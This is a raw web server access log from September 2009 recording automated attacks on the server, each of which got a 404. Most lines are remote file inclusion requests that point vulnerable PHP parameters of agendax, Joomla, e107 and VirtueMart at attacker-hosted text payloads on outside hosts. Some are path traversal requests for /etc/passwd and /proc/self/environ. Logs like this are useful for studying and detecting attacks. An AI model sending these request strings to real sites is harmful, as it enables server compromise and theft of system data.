218.38.136.251 - - [10/Sep/2009:20:17:19 -0500] "GET /logs/access_log.1243382400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:20 -0500] "GET /logs/access_log.1239667200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:20 -0500] "GET /logs/access_log.1243209600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:20 -0500] "GET /logs/access_log.1244851200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:20 -0500] "GET /logs/access_log.1241740800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:20 -0500] "GET /logs/access_log.1243123200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.52.17.34 - - [10/Sep/2009:20:17:22 -0500] "GET /logs/errors.php?error=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.52.17.34 - - [10/Sep/2009:20:17:22 -0500] "GET /errors.php?error=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.52.17.34 - - [10/Sep/2009:20:17:22 -0500] "GET /logs/access_log.1242691200/errors.php?error=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:32 -0500] "GET /logs/access_log.1241308800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:33 -0500] "GET /logs/access_log.1244678400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:04 -0500] "GET /logs/access_log.1245024000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:11 -0500] "GET /logs/access_log.1241308800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:12 -0500] "GET /logs/access_log.1244678400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:27 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:27 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:27 -0500] "GET /logs/access_log.1244764800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:30 -0500] "GET /logs/access_log.1240099200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:31 -0500] "GET /logs/access_log.1242777600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:31 -0500] "GET /logs/access_log.1240617600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:31 -0500] "GET /logs/access_log.1239580800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:31 -0500] "GET /logs/access_log.1247961600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:31 -0500] "GET /logs/access_log.1251763200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:31 -0500] "GET /logs/access_log.1247184000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:18:55 -0500] "GET /logs/access_log.1246579200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:10 -0500] "GET /logs/access_log.1246924800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:10 -0500] "GET /logs/access_log.1246492800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:10 -0500] "GET /logs/access_log.1240444800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:10 -0500] "GET /logs/access_log.1242518400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:10 -0500] "GET /logs/access_log.1244592000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:15 -0500] "GET /logs/access_log.1245024000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1243296000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1242777600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1240099200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1245628800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1239840000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1247961600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:16 -0500] "GET /logs/access_log.1239580800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:20 -0500] "GET /logs/access_log.1244160000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:20:19:34 -0500] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:20:19:34 -0500] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:20:19:34 -0500] "GET /logs/access_log.1239062400//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:41 -0500] "GET /logs/access_log.1251763200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:41 -0500] "GET /logs/access_log.1240617600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:41 -0500] "GET /logs/access_log.1247184000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:41 -0500] "GET /logs/access_log.1246579200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:48 -0500] "GET /logs/access_log.1245974400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:58 -0500] "GET /logs/access_log.1240444800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:58 -0500] "GET /logs/access_log.1246492800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:58 -0500] "GET /logs/access_log.1242518400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:19:59 -0500] "GET /logs/access_log.1246924800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.209 - - [10/Sep/2009:20:20:07 -0500] "GET /logs/access_log.1158278400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [10/Sep/2009:20:20:08 -0500] "GET /logs/access_log.1244592000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:20:08 -0500] "GET /logs/access_log.1244160000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:20:38 -0500] "GET /logs/access_log.1245974400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:20:53 -0500] "GET /logs/access_log.1244851200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:20:53 -0500] "GET /logs/access_log.1243209600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:21:23 -0500] "GET /logs/access_log.1243382400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:21:23 -0500] "GET /logs/access_log.1241740800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:21:23 -0500] "GET /logs/access_log.1239667200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:21:23 -0500] "GET /logs/access_log.1243123200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:21:41 -0500] "GET /logs/access_log.1241308800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:21:41 -0500] "GET /logs/access_log.1244678400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:20:21:57 -0500] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:20:21:57 -0500] "GET /logs/access_log.1239062400//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:20:21:57 -0500] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:22:44 -0500] "GET /logs/access_log.1242777600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:22:44 -0500] "GET /logs/access_log.1240099200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:22:44 -0500] "GET /logs/access_log.1239580800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:22:44 -0500] "GET /logs/access_log.1245628800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:22:44 -0500] "GET /logs/access_log.1245024000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:22:44 -0500] "GET /logs/access_log.1243296000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:20:22:53 -0500] "GET /index1.php?menu=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:20:22:53 -0500] "GET /logs/index1.php?menu=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
218.38.136.251 - - [10/Sep/2009:20:23:11 -0500] "GET /logs/access_log.1247184000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:11 -0500] "GET /logs/access_log.1246579200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:11 -0500] "GET /logs/access_log.1247961600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:11 -0500] "GET /logs/access_log.1240617600//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:11 -0500] "GET /logs/access_log.1251763200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:27 -0500] "GET /logs/access_log.1246492800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:27 -0500] "GET /logs/access_log.1240444800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:27 -0500] "GET /logs/access_log.1242518400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:27 -0500] "GET /logs/access_log.1244592000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:27 -0500] "GET /logs/access_log.1246924800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:36 -0500] "GET /logs/access_log.1244160000//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:23:36 -0500] "GET /logs/access_log.1245974400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.207.69 - - [10/Sep/2009:20:25:37 -0500] "GET /logs/access_log.1218153600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.146.119.209 - - [10/Sep/2009:20:26:01 -0500] "GET /logs/access_log.1237075200//include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:20:26:01 -0500] "GET //include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:20:26:01 -0500] "GET /logs//include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
82.146.119.209 - - [10/Sep/2009:20:26:16 -0500] "GET /logs/access_log.1236211200//include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.208.137 - - [10/Sep/2009:20:26:57 -0500] "GET /logs/access_log.1127433600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:26:58 -0500] "GET /logs/access_log.1228521600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:43 -0500] "GET /logs/access_log.1230422400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:43 -0500] "GET /logs/access_log.1175731200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:44 -0500] "GET /logs/access_log.1219190400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:47 -0500] "GET /logs/access_log.1150848000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:48 -0500] "GET /logs/access_log.1171670400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:48 -0500] "GET /logs/access_log.1170460800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [10/Sep/2009:20:27:48 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [10/Sep/2009:20:28:00 -0500] "GET //e107_handlers/secure_img_render.php?p=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:28:00 -0500] "GET /logs//e107_handlers/secure_img_render.php?p=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:28:00 -0500] "GET /logs/access_log.1243900800//e107_handlers/secure_img_render.php?p=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:28:04 -0500] "GET /logs//e107_handlers/secure_img_render.php?p=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:28:04 -0500] "GET /logs/access_log.1243900800//e107_handlers/secure_img_render.php?p=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:28:04 -0500] "GET //e107_handlers/secure_img_render.php?p=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.157.45.177 - - [10/Sep/2009:20:29:19 -0500] "GET /logs//kalender.php?vis=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""-"
88.157.45.177 - - [10/Sep/2009:20:29:19 -0500] "GET //kalender.php?vis=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""-"
88.157.45.177 - - [10/Sep/2009:20:29:19 -0500] "GET /logs//kalender.php?vis=./../../../../../../../../etc/passwd HTTP/1.1" 404 301 "-""-"
88.157.45.177 - - [10/Sep/2009:20:29:19 -0500] "GET //kalender.php?vis=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-""-"
66.135.42.157 - - [10/Sep/2009:20:29:55 -0500] "GET /index1.php?choix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:20:29:55 -0500] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
66.135.42.157 - - [10/Sep/2009:20:37:39 -0500] "GET /logs/media.php?page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""-"
66.135.42.157 - - [10/Sep/2009:20:37:39 -0500] "GET /media.php?page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""-"
211.189.18.73 - - [10/Sep/2009:20:42:53 -0500] "GET /logs/access_log.1244764800%22%20target=%22_blank///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.189.18.73 - - [10/Sep/2009:20:42:53 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.189.18.73 - - [10/Sep/2009:20:42:53 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.189.18.73 - - [10/Sep/2009:20:50:50 -0500] "GET //include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:20:50:50 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:20:50:50 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:20:50:50 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:20:52:03 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:20:52:03 -0500] "GET //include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:20:52:04 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
